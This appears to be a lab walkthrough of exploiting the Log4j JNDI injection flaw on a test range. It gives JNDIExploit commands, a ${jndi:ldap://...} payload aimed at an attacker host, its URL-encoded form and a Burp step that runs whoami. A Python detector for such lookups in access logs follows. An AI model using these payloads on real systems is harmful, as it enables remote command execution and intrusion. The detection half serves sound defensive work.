1. First build the log4j test range (a vulnerable lab environment)
2. Start the service
On the Windows attacker machine, run the following command:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888 -p 9999 -i 127.0.0.1
Open another cmd window to list the payloads that can be used:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -u
Any of the payloads listed above can be tried. Here we use:
ldap://null:1389/TomcatBypass/TomcatEcho
3. Construct the request
${jndi:ldap://192.168.155.2:8888/TomcatBypass/TomcatEcho}
and URL-encode it:
%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888/TomcatBypass/TomcatEcho%7D
4. Add cmd:whoami to the request packet in Burp (bp)
After the request is sent, the command is found to have executed.
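
A defender-side check for the request built in step 3, as an added example that is not part of the original write-up: it URL-decodes log lines and flags the `${jndi:...}` lookup in both its raw and encoded form, reporting the callback host, port and path. The log lines, the parameter name `q` and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the lookup form shown in step 3: ${jndi:<scheme>://host[:port]/path}
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)"
    r"(?::(?P<port>\d+))?(?P<path>/[^}\s]*)?\}",
    re.IGNORECASE,
)

def normalize(value, max_rounds=3):
    """URL-decode a bounded number of times so raw and encoded forms compare equal."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_jndi_lookups(line):
    """Return one dict per JNDI lookup found in a single log line."""
    hits = []
    for m in JNDI_RE.finditer(normalize(line)):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "port": int(m.group("port")) if m.group("port") else None,
            "path": m.group("path") or "",
        })
    return hits

# Constructed sample access-log lines (not taken from a real system).
SAMPLE_LOG = [
    '10.0.0.5 "GET /index?q=hello HTTP/1.1" 200',
    '10.0.0.9 "GET /index?q=%24%7Bjndi%3Aldap%3A//192.168.155.2%3A8888'
    '/TomcatBypass/TomcatEcho%7D HTTP/1.1" 200',
    '10.0.0.9 "GET /index?q=${jndi:ldap://192.168.155.2:8888'
    '/TomcatBypass/TomcatEcho} HTTP/1.1" 200',
]

def scan(lines):
    """Return (line_number, hit) pairs for every line containing a lookup."""
    return [(i, h) for i, l in enumerate(lines, 1) for h in find_jndi_lookups(l)]

if __name__ == "__main__":
    for lineno, hit in scan(SAMPLE_LOG):
        print(f"line {lineno}: {hit['scheme']} lookup to "
              f"{hit['host']}:{hit['port']}{hit['path']}")
```

The extracted host and port are the values to pivot on in egress firewall or proxy logs, since a successful lookup produces an outbound connection from the application server to that address.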